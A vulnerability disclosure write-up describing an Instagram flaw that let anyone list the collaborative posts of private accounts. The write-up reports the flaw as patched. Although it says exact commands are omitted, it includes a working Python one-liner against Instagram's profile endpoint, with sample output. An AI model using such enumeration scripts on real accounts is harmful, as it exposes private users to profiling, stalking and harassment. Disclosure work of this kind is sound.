I discovered a vulnerability that lets anyone discover collaborative posts of private Instagram accounts with public accounts.
What Was the Vulnerability?
Private Instagram accounts are meant to keep their posts and activity hidden from anyone who isn’t an approved follower. However, this vulnerability allowed anyone to determine whether a private account had collaborative posts with public accounts and to obtain identifiers for those posts.
This means private-account activity and relationships with public accounts could be exposed without following the account or having any authorization. While the actual media content remained protected, the exposure of collaboration metadata undermines user privacy.
Why Is This Dangerous?
This vulnerability could be abused in several ways:
- Attackers can discover which private accounts collaborate with specific public accounts (privacy disclosure).
- Metadata from collaborations can be collected and analyzed to map private users’ public activity (enumeration).
- It could enable profiling, stalking, or targeted harassment of private users.
- Automation could scale this behavior to track many private accounts at once.
Even though private media is not directly exposed, the ability to enumerate collaborations poses a serious privacy risk.
How to Reproduce the Issue (high‑level, non‑actionable)
Below is a non‑technical description of the test setup and verification method I used. Exact API calls, scripts, and terminal commands are intentionally omitted from this public write‑up to avoid enabling abuse.
- Create two accounts that you control:
<PRIVATE_TEST>— set this account to Private.<PUBLIC_TEST>— set this account to Public.
- From
<PRIVATE_TEST>, publish a post that includes a collaboration with<PUBLIC_TEST>(using the normal Instagram collaboration/post creation flow in the app). - On a terminal, run the following code (replace <PRIVATE_TEST>)
python3 -c "import requests,json,urllib3;urllib3.disable_warnings();u='<PRIVATE_TEST>';r=requests.get(f'https://www.instagram.com/api/v1/users/web_profile_info/?username={u}',headers={'X-IG-App-ID':'936619743392459'},verify=False);d=r.json();p=d['data']['user']['edge_owner_to_timeline_media']['edges'];print(f'🔗 @{u} ({len(p)} posts):');matches=0;[print(f'{i}. https://instagram.com/p/{post[\"node\"][\"shortcode\"]} 🤝 @{\" @\".join([c[\"node\"][\"user\"][\"username\"] for c in post[\"node\"].get(\"edge_media_to_tagged_user\",{}).get(\"edges\",[])])}') for i,post in enumerate(p,1) if post['node'].get('edge_media_to_tagged_user',{}).get('edges',[])] or print('No collabs')"🔗 @<PRIVATE_TEST> (2 posts):
1. https://instagram.com/p/DK2qCIWiLZOKZHVEVj2CjSjKKhk0Spl_fizpo0 🤝 @<PUBLIC_TEST>.
2. https://instagram.com/p/QR2qCIWiLXZOASGj2CjSjKKhk0Spl_fizpo0 🤝 @<PUBLIC_TEST>.
Impact on Instagram Users
This vulnerability affects all private Instagram accounts that collaborate with public accounts. Any private account participating in collaborations could have its activity enumerated, potentially exposing relationships or associations the user expected to remain private.
Resolution and Fix
After responsible disclosure, Instagram acknowledged the vulnerability and deployed a fix. The platform has patched the issue to prevent unauthenticated discovery of collaborative post identifiers for private accounts.
Resolution: Instagram has patched the vulnerability and implemented measures to secure collaborative post metadata, preserving private-account privacy.
